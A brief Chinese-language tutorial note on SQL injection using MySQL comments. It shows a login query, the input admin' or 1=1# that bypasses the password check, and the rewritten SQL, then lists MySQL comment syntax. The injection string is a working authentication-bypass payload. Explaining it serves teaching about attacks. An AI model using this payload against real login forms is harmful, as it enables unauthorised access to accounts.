SQL注入之註釋
select name,pass from tbAdmin where name='admin' and pass='123456'
輸入:admin' or 1=1#
SQL變成下面這個樣子:
select name,pass from tbAdmin where name='admin' or 1=1#' and pass='123456'
你會發現隨便輸入密碼,都可以隨便登陸了。。。
-----------------------------------------------------
select * from tbAdmin # 這是MySQL註釋
select * from tbAdmin /* 這是MySQL註釋 */